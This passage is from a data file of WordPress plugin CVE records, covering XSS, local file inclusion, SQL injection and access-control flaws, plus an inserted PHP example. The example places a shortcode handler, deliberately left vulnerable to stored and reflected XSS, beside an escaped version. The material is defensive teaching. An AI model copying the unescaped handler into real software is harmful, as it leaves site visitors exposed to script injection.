version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3233979%40admire-extra&new=3233979%40admire-extra\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3233979%40admire-extra&new=3233979%40admire-extra\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf682127-4b97-44ce-a94d-3a237c5af1cc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf682127-4b97-44ce-a94d-3a237c5af1cc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
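Two XSS shapes recur in the records above: reflected XSS from add_query_arg() used without escaping (CVE-2024-8656, CVE-2024-8738), and stored XSS from shortcode attributes, block options or settings echoed unescaped (CVE-2022-4651, CVE-2023-6854, CVE-2023-3129, CVE-2022-23179, CVE-2025-3414, CVE-2024-4753, CVE-2024-13665). The following is an added example, not code from any of those plugins, with one shortcode that has both defects and its escaped form. The shortcode name and attribute names are illustrative.

```php
<?php
// Added example, not from any plugin listed here.

// VULNERABLE. Two bugs in one handler:
// 1. $atts['title'] lands in an HTML attribute unescaped, so a Contributor who
//    can place the shortcode stores  "><script>...  in the post (stored XSS).
// 2. add_query_arg() with no URL argument builds on the current request URI,
//    so the path and query string of whatever URL the visitor clicked are
//    reflected into the href unescaped (reflected XSS via a crafted link).
function example_button_shortcode_vulnerable($atts) {
    $atts = shortcode_atts(['title' => 'Next', 'page' => 2], $atts, 'example_button');
    $href = add_query_arg('paged', $atts['page']);
    return '<a class="btn" href="' . $href . '" title="' . $atts['title'] . '">'
         . $atts['title'] . '</a>';
}

// HARDENED: escape at output, for the context each value lands in.
//   esc_url()  for href (also rejects javascript: and data: schemes)
//   esc_attr() for attribute values
//   esc_html() for text nodes (wp_kses_post() only if limited HTML is intended)
// Validate the type as well: a page number is an integer, never free text.
function example_button_shortcode_hardened($atts) {
    $atts = shortcode_atts(['title' => 'Next', 'page' => 2], $atts, 'example_button');
    $page = max(1, absint($atts['page']));
    $href = esc_url(add_query_arg('paged', $page));
    return sprintf(
        '<a class="btn" href="%s" title="%s">%s</a>',
        $href,
        esc_attr($atts['title']),
        esc_html($atts['title'])
    );
}
add_shortcode('example_button', 'example_button_shortcode_hardened');

// The same rule covers settings pages. Escape admin-entered values on output too:
// without unfiltered_html (the multisite case named in several records) an admin
// is not trusted with raw HTML, and a CSRF'd settings save would otherwise store
// a payload that every later admin page view executes.
function example_render_setting(string $option): string {
    return esc_html((string) get_option($option, ''));
}
```

The fix is the same whether the value came from a Contributor's shortcode, a block option or an admin settings form: the escaping function is chosen by where the output lands, not by who supplied the input.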
{"CVE_ID":"CVE-2024-13409","slug":"post-grid-carousel-ultimate","versionImpact":"1.6.10","versionEndExcluding":"1.7","description":"The Post Grid, Slider & Carousel Ultimate \u2013 with Shortcode, Gutenberg Block & Elementor Widget plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.6.10 via the 'theme' parameter of the post_type_ajax_handler() function. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/ja.wordpress.org\\\/plugins\\\/post-grid-carousel-ultimate\\\/\",\"name\":\"https:\\\/\\\/ja.wordpress.org\\\/plugins\\\/post-grid-carousel-ultimate\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-grid-carousel-ultimate\\\/tags\\\/1.6.10\\\/includes\\\/classes\\\/ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-grid-carousel-ultimate\\\/tags\\\/1.6.10\\\/includes\\\/classes\\\/ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3227281\\\/post-grid-carousel-ultimate\\\/tags\\\/1.7\\\/includes\\\/classes\\\/ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3227281\\\/post-grid-carousel-ultimate\\\/tags\\\/1.7\\\/includes\\\/classes\\\/ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/38672a45-b7a7-445f-9e77-7050df6920fa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/38672a45-b7a7-445f-9e77-7050df6920fa?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13408","slug":"post-grid-carousel-ultimate","versionImpact":"1.6.10","versionEndExcluding":"1.7","description":"The Post Grid, Slider & Carousel Ultimate \u2013 with Shortcode, Gutenberg Block & Elementor Widget plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.6.10 via the 'theme' attribute of the `pgcu` shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where php files can be uploaded and included.","recommendation":"Update to version 1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3227281\\\/post-grid-carousel-ultimate\\\/tags\\\/1.7\\\/includes\\\/classes\\\/shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3227281\\\/post-grid-carousel-ultimate\\\/tags\\\/1.7\\\/includes\\\/classes\\\/shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff346465-62c2-4a2b-8a4a-c88558d7cabd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff346465-62c2-4a2b-8a4a-c88558d7cabd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4346","slug":"ulisting","versionImpact":"1.6.6","versionEndExcluding":"1.7","description":"The uListing plugin for WordPress is vulnerable to Unauthenticated Arbitrary Account Changes in versions up to, and including, 1.6.6. This is due to missing login checks on the stm_listing_profile_edit AJAX action. This makes it possible for unauthenticated attackers to edit any account on the blog, such as changing the admin account's email address.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41800ea9-1ace-42fc-9e7f-d760a126342b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41800ea9-1ace-42fc-9e7f-d760a126342b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2456786%40ulisting&new=2456786%40ulisting&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2456786%40ulisting&new=2456786%40ulisting&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ulisting-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ulisting-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4345","slug":"ulisting","versionImpact":"1.6.6","versionEndExcluding":"1.7","description":"The uListing plugin for WordPress is vulnerable to authorization bypass due to missing capability and nonce checks on the UlistingUserRole::save_role_api method in versions up to, and including, 1.6.6. This makes it possible for unauthenticated attackers to remove or add roles, and add capabilities.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44e112a7-8f51-4d2a-a4b3-74a47ef3aec7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44e112a7-8f51-4d2a-a4b3-74a47ef3aec7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2456786%40ulisting&new=2456786%40ulisting&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2456786%40ulisting&new=2456786%40ulisting&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ulisting-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ulisting-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4341","slug":"ulisting","versionImpact":"1.6.6","versionEndExcluding":"1.7","description":"The uListing plugin for WordPress is vulnerable to authorization bypass via Ajax due to missing capability checks, missing input validation, and a missing security nonce in the stm_update_email_data AJAX action in versions up to, and including, 1.6.6. This makes it possible for unauthenticated attackers to change any WordPress option in the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1814537d-8307-4d1f-86c8-801519172be5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1814537d-8307-4d1f-86c8-801519172be5?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ulisting-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ulisting-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4340","slug":"ulisting","versionImpact":"1.6.6","versionEndExcluding":"1.7","description":"The uListing plugin for WordPress is vulnerable to generic SQL Injection via the \u2018listing_id\u2019 parameter in versions up to, and including, 1.6.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10b7a88f-ce46-42aa-ab5a-81f38288a659?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10b7a88f-ce46-42aa-ab5a-81f38288a659?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ulisting-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ulisting-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5585","slug":"so-widgets-bundle","versionImpact":"1.68.5","versionEndExcluding":"1.69.0","description":"The SiteOrigin Widgets Bundle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `data-url` DOM Element Attribute in all versions up to, and including, 1.68.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.69.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/so-widgets-bundle\\\/tags\\\/1.68.4\\\/js\\\/slider\\\/jquery.slider.js\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/so-widgets-bundle\\\/tags\\\/1.68.4\\\/js\\\/slider\\\/jquery.slider.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb1b93ee-8641-4ddb-8b6b-2e9d30fe338d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb1b93ee-8641-4ddb-8b6b-2e9d30fe338d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4799","slug":"wp-downloadmanager","versionImpact":"1.68.10","versionEndExcluding":"1.68.11","description":"The WP-DownloadManager plugin for WordPress is vulnerable to arbitrary file deletion due to lack of restriction on the directory a file can be deleted from in all versions up to, and including, 1.68.10. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). This vulnerability can be paired with CVE-2025-4798 to delete any file within the WordPress root directory.","recommendation":"Update to version 1.68.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-downloadmanager\\\/trunk\\\/download-manager.php#L215\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-downloadmanager\\\/trunk\\\/download-manager.php#L215\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-downloadmanager\\\/trunk\\\/download-options.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-downloadmanager\\\/trunk\\\/download-options.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-downloadmanager\\\/trunk\\\/download-options.php#L42\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-downloadmanager\\\/trunk\\\/download-options.php#L42\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3294467\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3294467\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9d9e485-171f-4e36-943d-397d540e31f4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9d9e485-171f-4e36-943d-397d540e31f4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4798","slug":"wp-downloadmanager","versionImpact":"1.68.10","versionEndExcluding":"1.68.11","description":"The WP-DownloadManager plugin for WordPress is vulnerable to arbitrary file read in all versions up to, and including, 1.68.10. This is due to a lack of restriction on the directory an administrator can select for storing downloads. This makes it possible for authenticated attackers, with Administrator-level access and above, to download and read any file on the server, including system and configuration files.","recommendation":"Update to version 1.68.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-downloadmanager\\\/trunk\\\/download-options.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-downloadmanager\\\/trunk\\\/download-options.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-downloadmanager\\\/trunk\\\/download-options.php#L42\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-downloadmanager\\\/trunk\\\/download-options.php#L42\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3294467\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3294467\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6cd166bc-774e-4083-b5f7-bffba1f7c293?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6cd166bc-774e-4083-b5f7-bffba1f7c293?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5770","slug":"wp-force-ssl","versionImpact":"1.66","versionEndExcluding":"1.67","description":"The WP Force SSL & HTTPS SSL Redirect plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ajax_save_setting' function in versions up to, and including, 1.66. This makes it possible for authenticated attackers, subscriber-level permissions and above, to update the plugin settings.","recommendation":"Update to version 1.67, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2081e4a-c6b7-4730-be59-bc728b90ecaa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2081e4a-c6b7-4730-be59-bc728b90ecaa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-force-ssl\\\/tags\\\/1.66\\\/wp-force-ssl.php#L953\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-force-ssl\\\/tags\\\/1.66\\\/wp-force-ssl.php#L953\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/swisskyrepo.github.io\\\/PayloadsAllTheThings\\\/CRLF%20Injection\\\/\",\"name\":\"https:\\\/\\\/swisskyrepo.github.io\\\/PayloadsAllTheThings\\\/CRLF%20Injection\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3099110\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3099110\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11366","slug":"seo-landing-page-generator","versionImpact":"1.66.2","versionEndExcluding":"1.66.3","description":"The SEO Landing Page Generator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.66.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.66.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-landing-page-generator\\\/trunk\\\/admin\\\/class-issslpg-admin-location-settings-page.php#L185\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-landing-page-generator\\\/trunk\\\/admin\\\/class-issslpg-admin-location-settings-page.php#L185\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-landing-page-generator\\\/trunk\\\/admin\\\/class-issslpg-admin-location-settings-page.php#L330\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-landing-page-generator\\\/trunk\\\/admin\\\/class-issslpg-admin-location-settings-page.php#L330\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-landing-page-generator\\\/trunk\\\/admin\\\/class-issslpg-admin-location-settings-page.php#L433\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-landing-page-generator\\\/trunk\\\/admin\\\/class-issslpg-admin-location-settings-page.php#L433\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3197642%40seo-landing-page-generator&new=3197642%40seo-landing-page-generator&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3197642%40seo-landing-page-generator&new=3197642%40seo-landing-page-generator&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/99dcb6c4-b9c6-4d3d-942f-b3877cc3efa7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/99dcb6c4-b9c6-4d3d-942f-b3877cc3efa7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5706","slug":"vk-blocks","versionImpact":"1.63.0.1","versionEndExcluding":"1.64.0.0","description":"The VK Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'vk-blocks\/ancestor-page-list' block in all versions up to, and including, 1.63.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.64.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05dd7c96-7880-44a8-a06f-037bc627fd8d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05dd7c96-7880-44a8-a06f-037bc627fd8d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vk-blocks\\\/tags\\\/1.63.0.1\\\/inc\\\/vk-blocks\\\/build\\\/blocks\\\/ancestor-page-list\\\/index.php#L50\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vk-blocks\\\/tags\\\/1.63.0.1\\\/inc\\\/vk-blocks\\\/build\\\/blocks\\\/ancestor-page-list\\\/index.php#L50\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vk-blocks\\\/tags\\\/1.63.0.1\\\/inc\\\/vk-blocks\\\/build\\\/blocks\\\/ancestor-page-list\\\/index.php#L54\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vk-blocks\\\/tags\\\/1.63.0.1\\\/inc\\\/vk-blocks\\\/build\\\/blocks\\\/ancestor-page-list\\\/index.php#L54\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vk-blocks\\\/tags\\\/1.63.0.1\\\/inc\\\/vk-blocks\\\/build\\\/blocks\\\/ancestor-page-list\\\/index.php#L57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vk-blocks\\\/tags\\\/1.63.0.1\\\/inc\\\/vk-blocks\\\/build\\\/blocks\\\/ancestor-page-list\\\/index.php#L57\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2983202\\\/vk-blocks\\\/trunk\\\/inc\\\/vk-blocks\\\/build\\\/blocks\\\/ancestor-page-list\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2983202\\\/vk-blocks\\\/trunk\\\/inc\\\/vk-blocks\\\/build\\\/blocks\\\/ancestor-page-list\\\/index.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5901","slug":"so-widgets-bundle","versionImpact":"1.62.2","versionEndExcluding":"1.62.3","description":"The SiteOrigin Widgets Bundle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Image Grid widget in all versions up to, and including, 1.62.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.62.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0045c5a4-0807-4e89-8639-0802e54ce6ab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0045c5a4-0807-4e89-8639-0802e54ce6ab?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/so-widgets-bundle\\\/tags\\\/1.62.0\\\/widgets\\\/image-grid\\\/tpl\\\/default.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/so-widgets-bundle\\\/tags\\\/1.62.0\\\/widgets\\\/image-grid\\\/tpl\\\/default.php#L28\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/so-widgets-bundle\\\/tags\\\/1.62.0\\\/widgets\\\/image-grid\\\/image-grid.php#L282\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/so-widgets-bundle\\\/tags\\\/1.62.0\\\/widgets\\\/image-grid\\\/image-grid.php#L282\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5090","slug":"so-widgets-bundle","versionImpact":"1.61.1","versionEndExcluding":"1.62.0","description":"The SiteOrigin Widgets Bundle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's SiteOrigin Blog Widget in all versions up to, and including, 1.61.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.62.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2878de45-0123-4e07-bfec-015b36b11d01?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2878de45-0123-4e07-bfec-015b36b11d01?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098819\\\/so-widgets-bundle\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098819\\\/so-widgets-bundle\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4362","slug":"so-widgets-bundle","versionImpact":"1.60.0","versionEndExcluding":"1.61.0","description":"The SiteOrigin Widgets Bundle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'siteorigin_widget' shortcode in all versions up to, and including, 1.60.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.61.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b7926ec6-3441-4062-93b2-6c2120c9f406?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b7926ec6-3441-4062-93b2-6c2120c9f406?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/so-widgets-bundle\\\/trunk\\\/base\\\/inc\\\/shortcode.php#L27\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/so-widgets-bundle\\\/trunk\\\/base\\\/inc\\\/shortcode.php#L27\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088997\\\/so-widgets-bundle\\\/trunk\\\/base\\\/inc\\\/shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088997\\\/so-widgets-bundle\\\/trunk\\\/base\\\/inc\\\/shortcode.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2225","slug":"responsive-addons-for-elementor","versionImpact":"1.6.9","versionEndExcluding":"1.6.9.1","description":"The Responsive Addons for Elementor \u2013 Free Elementor Addons Plugin and Elementor Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018rael_title_tag' parameter in all versions up to, and including, 1.6.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The vulnerability was partially patched in version 1.6.9.","recommendation":"Update to version 1.6.9.1, or a newer patched 